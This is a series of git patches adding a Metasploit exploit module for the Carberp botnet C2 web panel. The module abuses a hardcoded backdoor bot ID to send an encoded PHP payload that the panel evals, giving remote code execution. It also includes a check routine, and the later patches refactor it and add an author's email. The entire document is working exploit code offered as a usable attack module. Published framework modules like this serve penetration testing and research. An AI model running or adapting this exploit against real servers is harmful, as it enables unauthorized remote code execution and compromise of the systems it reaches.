From fe0e16183c2f930b21bb9c7e5d9c73198b306ed4 Mon Sep 17 00:00:00 2001
From: Brian Wallace <bwall@openbwall.com>
Date: Fri, 28 Jun 2013 14:47:13 -0700
Subject: [PATCH 1/5] Carberp backdoor eval PoC

---
 .../multi/http/carberp_backdoor_exec.rb       | 93 +++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 modules/exploits/multi/http/carberp_backdoor_exec.rb

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
new file mode 100644
index 0000000000..8627bbd4b5
--- /dev/null
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
+			'Description'    => %q{
+					This module exploits backdoors that can be sighted all over the leaked
+				source code of the Carberp botnet C2 Web Panel.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
+					'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
+					'Steven K' # discovery and reporting
+				],
+			'References'     =>
+				[
+					['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Keys'        => ['php'],
+					'Space'       => 10000,
+					'DisableNops' => true
+				},
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['carberp', {}]
+				],
+			'DisclosureDate' => 'Jun 28 2013',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]),
+				OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
+			],self.class)
+	end
+
+	def check
+		uri = normalize_uri(target_uri.path.to_s)
+		confirm_string = rand_text_alpha(8)
+		cmd = "echo '#{confirm_string}';"
+		request_parameters = {
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
+				{
+					'id' => datastore['BOTID'],
+					'data' => Rex::Text.encode_base64(cmd.unpack('H*'))
+				}
+		}
+		shell = send_request_cgi(request_parameters)
+		if (shell and shell.body =~ /#{confirm_string}/)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def http_send_command(cmd)
+		uri = normalize_uri(target_uri.path.to_s)
+		request_parameters = {
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
+				{
+					'id' => datastore['BOTID'],
+					"data" => Rex::Text.encode_base64(cmd.unpack('H*'))
+				}
+		}
+		res = send_request_cgi(request_parameters)
+	end
+
+	def exploit
+		http_send_command(payload.encoded)
+	end
+end

From 9486364cc458966345dd24771d29669e082295b4 Mon Sep 17 00:00:00 2001
From: "(B)rian (Wall)ace" <nightstrike9809@gmail.com>
Date: Fri, 28 Jun 2013 15:31:17 -0700
Subject: [PATCH 2/5] Added Steven K's email

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 8627bbd4b5..b38611404d 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
 					'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
-					'Steven K' # discovery and reporting
+					'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting
 				],
 			'References'     =>
 				[

From b8cada9ab039fa5200ed3a19cc5f8a46a5b4a942 Mon Sep 17 00:00:00 2001
From: Brian Wallace <bwall@openbwall.com>
Date: Fri, 28 Jun 2013 22:44:23 -0700
Subject: [PATCH 3/5] Applied some refactoring to decrease line count

---
 .../exploits/multi/http/carberp_backdoor_exec.rb    | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 8627bbd4b5..1926904fae 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -54,19 +54,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path.to_s)
 		confirm_string = rand_text_alpha(8)
 		cmd = "echo '#{confirm_string}';"
-		request_parameters = {
-			'method'	=> 'POST',
-			'uri'		=> uri,
-			'vars_post'	=>
-				{
-					'id' => datastore['BOTID'],
-					'data' => Rex::Text.encode_base64(cmd.unpack('H*'))
-				}
-		}
-		shell = send_request_cgi(request_parameters)
+		shell = http_send_command(cmd)
 		if (shell and shell.body =~ /#{confirm_string}/)
 			return Exploit::CheckCode::Vulnerable
 		end
@@ -85,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 		}
 		res = send_request_cgi(request_parameters)
+		return res
 	end
 
 	def exploit

From ec7c9b039a0ff4cfae1c4f6d4f74d8b60260e2e0 Mon Sep 17 00:00:00 2001
From: Brian Wallace <bwall@openbwall.com>
Date: Sat, 29 Jun 2013 09:45:22 -0700
Subject: [PATCH 4/5] Further refactoring requested

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index f69a3ba203..64597acc38 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -57,10 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		confirm_string = rand_text_alpha(8)
 		cmd = "echo '#{confirm_string}';"
 		shell = http_send_command(cmd)
-		if (shell and shell.body =~ /#{confirm_string}/)
-			return Exploit::CheckCode::Vulnerable
+		check_code = Exploit::CheckCode::Safe
+
+		if shell and shell.body.include?(confirm_string)
+			check_code = Exploit::CheckCode::Vulnerable
 		end
-		return Exploit::CheckCode::Safe
+
+		check_code
 	end
 
 	def http_send_command(cmd)
@@ -75,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 		}
 		res = send_request_cgi(request_parameters)
-		return res
+		res
 	end
 
 	def exploit

From d990c7f21f9360feb1d8360cd17e6f97fceb2e02 Mon Sep 17 00:00:00 2001
From: Brian Wallace <bwall@openbwall.com>
Date: Sat, 29 Jun 2013 09:46:36 -0700
Subject: [PATCH 5/5] Dat line

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 64597acc38..77c1fd4eb1 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -78,6 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 		}
 		res = send_request_cgi(request_parameters)
+		
 		res
 	end